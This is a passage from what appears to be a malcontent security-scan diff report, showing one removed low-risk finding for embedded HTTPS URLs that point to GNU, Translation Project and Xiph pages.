[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | +| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https%3A%2F%2Fwiki.xiph.org%2FMIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https%3A%2F%2Fwww.gnu.org%2Fsoftware%2Fcoreutils%2F)
[https://translationproject.org/team/](https%3A%2F%2Ftranslationproject.org%2Fteam%2F)
[https://gnu.org/licenses/gpl.html](https%3A%2F%2Fgnu.org%2Flicenses%2Fgpl.html) |